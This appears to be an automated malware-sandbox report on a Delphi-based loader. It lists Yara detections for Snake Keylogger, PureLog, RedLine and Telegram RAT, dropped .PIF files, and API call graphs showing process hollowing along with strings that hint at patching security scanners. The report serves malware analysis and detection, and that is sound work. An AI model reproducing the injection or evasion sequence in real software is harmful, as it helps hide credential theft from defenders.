                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.3435325759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.2342337171.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.3475804863.00000000370D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034797000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.000000003475D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.000000003461A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.3471546461.0000000034551000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:10
                                                                                                                      Start time:10:17:03
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\Cneehezx.PIF
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\Public\Libraries\Cneehezx.PIF"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:1'019'392 bytes
                                                                                                                      MD5 hash:7D212D2DAB091BEC36A906828D270C65
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:Borland Delphi
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:11
                                                                                                                      Start time:10:17:04
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                      Imagebase:0x790000
                                                                                                                      File size:236'544 bytes
                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:12
                                                                                                                      Start time:10:17:04
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:13
                                                                                                                      Start time:10:17:04
                                                                                                                      Start date:18/12/2024
                                                                                                                      Path:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:175'800 bytes
                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030E4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000001.2421840333.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000D.00000002.3472612070.00000000330F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.3435459349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030E57000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000D.00000002.3468608975.0000000030D71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Has exited:false

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:16.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:10.3%
                                                                                                                        Total number of Nodes:290
                                                                                                                        Total number of Limit Nodes:16
29c46a4 26104->29100 29102 29d80c8 29064->29102 29066 29d8745 29113 29d7d00 29066->29113 29070 29c2eed 29069->29070 29071 29c2ef8 GetTickCount 29069->29071 29070->26083 29071->26083 29073 29c479c 29072->29073 29074 29c47fd 29072->29074 29075 29c47a4 29073->29075 29076 29c4500 29073->29076 29075->29074 29077 29c47b3 29075->29077 29079 29c4500 11 API calls 29075->29079 29080 29c4570 11 API calls 29076->29080 29082 29c4514 29076->29082 29081 29c4570 11 API calls 29077->29081 29078 29c4542 29078->26094 29079->29077 29080->29082 29084 29c47cd 29081->29084 29082->29078 29083 29c2c2c 11 API calls 29082->29083 29083->29078 29085 29c4500 11 API calls 29084->29085 29086 29c47f9 29085->29086 29086->26094 29088 29d8838 29087->29088 29089 29d8857 LoadLibraryA 29088->29089 29090 29d8867 29089->29090 29091 29d8020 17 API calls 29090->29091 29092 29d886d 29091->29092 29093 29d80c8 15 API calls 29092->29093 29094 29d8886 29093->29094 29095 29d7d00 18 API calls 29094->29095 29096 29d88e5 FreeLibrary 29095->29096 29097 29d88fd 29096->29097 29098 29c44d0 11 API calls 29097->29098 29099 29d890a 29098->29099 29099->26099 29101 29c46aa 29100->29101 29103 29c4500 11 API calls 29102->29103 29104 29d80ed 29103->29104 29127 29d7914 29104->29127 29107 29c4798 11 API calls 29108 29d8107 29107->29108 29109 29d810f GetModuleHandleW GetProcAddress GetProcAddress 29108->29109 29110 29d8142 29109->29110 29133 29c44d0 29110->29133 29114 29c4500 11 API calls 29113->29114 29115 29d7d25 29114->29115 29116 29d7914 12 API calls 29115->29116 29117 29d7d32 29116->29117 29118 29c4798 11 API calls 29117->29118 29119 29d7d42 29118->29119 29138 29d8020 29119->29138 29122 29d80c8 15 API calls 29123 29d7d5b NtWriteVirtualMemory 29122->29123 29124 29d7d87 29123->29124 29125 29c44d0 11 API calls 29124->29125 29126 29d7d94 FreeLibrary 29125->29126 29126->26081 29128 29d7925 29127->29128 29129 29c4b78 11 API calls 29128->29129 29131 29d7935 29129->29131 29130 29d79a1 29130->29107 29131->29130 29137 29cba44 CharNextA 
29131->29137 29135 29c44d6 29133->29135 29134 29c44fc 29134->29066 29135->29134 29136 29c2c2c 11 API calls 29135->29136 29136->29135 29137->29131 29139 29c4500 11 API calls 29138->29139 29140 29d8043 29139->29140 29141 29d7914 12 API calls 29140->29141 29142 29d8050 29141->29142 29143 29d8058 GetModuleHandleA 29142->29143 29144 29d80c8 15 API calls 29143->29144 29145 29d8069 GetModuleHandleA 29144->29145 29146 29d8087 29145->29146 29147 29c44ac 11 API calls 29146->29147 29148 29d7d55 29147->29148 29148->29122

                                                                                                                        Control-flow Graph (entry 29d8bb0; node legend: Executed, Not Executed)
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                          • Part of subcall function 029D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029D8668
                                                                                                                        • GetThreadContext.KERNEL32(00000860,02A21420,ScanString,02A213A4,029DA77C,UacInitialize,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,UacInitialize,02A213A4), ref: 029D9442
                                                                                                                          • Part of subcall function 029D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D82C5
                                                                                                                          • Part of subcall function 029D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 029D8529
                                                                                                                          • Part of subcall function 029D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        • SetThreadContext.KERNEL32(00000860,02A21420,ScanBuffer,02A213A4,029DA77C,ScanString,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,00000870,0036BFF8,02A214F8,00000004,02A214FC), ref: 029DA157
                                                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000860,00000000,00000860,02A21420,ScanBuffer,02A213A4,029DA77C,ScanString,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,00000870,0036BFF8,02A214F8), ref: 029DA164
                                                                                                                          • Part of subcall function 029D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                          • Part of subcall function 029D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
                                                                                                                          • Part of subcall function 029D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                        • API String ID: 1022112746-51457883
                                                                                                                        • Opcode ID: d92084f225c9117178e6b353cea829ef0de14e5dfe06ef1c59b74f520bab1ba2
                                                                                                                        • Instruction ID: 3f4a4d951d8606a5af7e6c4cd7a11e5f9a2f716f4ce8f76c6f58227423ead3b6
                                                                                                                        • Opcode Fuzzy Hash: d92084f225c9117178e6b353cea829ef0de14e5dfe06ef1c59b74f520bab1ba2
                                                                                                                        • Instruction Fuzzy Hash: 8CE21E35B501189BDB11FB64CDA0BDE73FAAFC9310F2090A5E009AB255DB30EE569F52

                                                                                                                        Control-flow Graph (entry 29d8bae; node legend: Executed, Not Executed)
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                          • Part of subcall function 029D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029D8668
                                                                                                                        • GetThreadContext.KERNEL32(00000860,02A21420,ScanString,02A213A4,029DA77C,UacInitialize,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,UacInitialize,02A213A4), ref: 029D9442
                                                                                                                          • Part of subcall function 029D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D82C5
                                                                                                                          • Part of subcall function 029D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 029D8529
                                                                                                                          • Part of subcall function 029D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryMemoryVirtual$AllocateContextCreateFreeLoadProcessReadSectionThreadUnmapUserView
                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                        • API String ID: 4113022151-51457883
                                                                                                                        • Opcode ID: ac664f6e160cb30134341b05af1ad2c25a0e5ae65f8f81d93c6cf2670d88bbb7
                                                                                                                        • Instruction ID: f3b5d722b6785ea9a9c7c5f99f7d0cf6fc0f4694cc8f76880fec9cdb3d0d6979
                                                                                                                        • Opcode Fuzzy Hash: ac664f6e160cb30134341b05af1ad2c25a0e5ae65f8f81d93c6cf2670d88bbb7
                                                                                                                        • Instruction Fuzzy Hash: A6E21D35B501189BDB11FB64CDA0BDE73FAAFC9310F2090A5E009AB215DE30EE569F52

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,029C0000,029ED790), ref: 029C5A94
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AB2
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,029C0000,029ED790), ref: 029C5AD0
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 029C5AEE
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 029C5B37
                                                                                                                        • RegQueryValueExA.ADVAPI32(?,029C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,029C5B7D,?,80000001), ref: 029C5B55
                                                                                                                        • RegCloseKey.ADVAPI32(?,029C5B84,00000000,?,?,00000000,029C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 029C5B77
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029C5B94
                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029C5BA1
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029C5BA7
                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029C5BD2
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C19
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C29
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029C5C51
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029C5C61
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029C5C87
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029C5C97
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                                        • Opcode ID: 06ed4f580039d90649b2f12b992b881ffff81e967019d1970d03cd6af59d9d49
                                                                                                                        • Instruction ID: 65bf1e0ae7b942914bdefc11563eac4655be630858bd94eac36b932aa8e76e26
                                                                                                                        • Opcode Fuzzy Hash: 06ed4f580039d90649b2f12b992b881ffff81e967019d1970d03cd6af59d9d49
                                                                                                                        • Instruction Fuzzy Hash: 7451E871A4020C7EFB25D6A4CC46FEFBBBD9B44340FA101A9A604F61C1DB74EA448F66

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
